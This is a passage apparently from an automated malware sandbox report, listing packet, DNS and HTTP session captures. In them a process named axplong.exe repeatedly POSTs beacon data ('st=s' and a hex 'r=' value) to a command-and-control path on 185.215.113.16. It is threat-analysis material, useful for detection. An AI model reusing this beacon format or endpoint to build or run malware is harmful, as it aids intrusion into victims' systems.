Jul 26, 2024 21:00:55.251728058 CEST	51190	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.363351107 CEST	51190	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.363729000 CEST	51191	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.368730068 CEST	80	51191	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:55.369230986 CEST	80	51190	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:55.369322062 CEST	51190	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.369493008 CEST	51191	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.369916916 CEST	51191	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:55.375216007 CEST	80	51191	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:56.157407045 CEST	80	51191	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:56.157574892 CEST	51191	80	192.168.2.6	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:59:26.978061914 CEST	53	50869	162.159.36.2	192.168.2.6
Jul 26, 2024 20:59:27.471333981 CEST	65053	53	192.168.2.6	1.1.1.1
Jul 26, 2024 20:59:27.491683960 CEST	53	65053	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 20:59:27.471333981 CEST	192.168.2.6	1.1.1.1	0x296	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 20:59:27.491683960 CEST	1.1.1.1	192.168.2.6	0x296	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:03.951773882 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:05.168243885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:05.168586969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:05.170865059 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:05.433532953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49700	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:05.561290979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:06.351094007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:06.351958990 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:06.606599092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49701	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:06.727173090 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:07.535132885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:07.536278009 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:07.806822062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49702	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:07.956955910 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:08.716974974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:08.717758894 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:09.033060074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49703	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:09.147656918 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:09.888726950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:09.889708996 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:10.137224913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49704	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:10.256383896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:11.053632021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:11.054737091 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:11.302748919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49708	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:11.412678003 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:12.245943069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:12.246722937 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:12.502916098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49710	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:12.625777006 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:13.428133965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:13.436844110 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:13.689023972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49714	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:13.811487913 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:14.559926987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:14.561880112 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:14.808888912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49715	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:14.929208994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:15.678265095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:15.679366112 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:15.942840099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49716	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:16.053364038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:16.804059982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:16.805102110 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:17.097984076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49717	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:17.217320919 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:17.974831104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
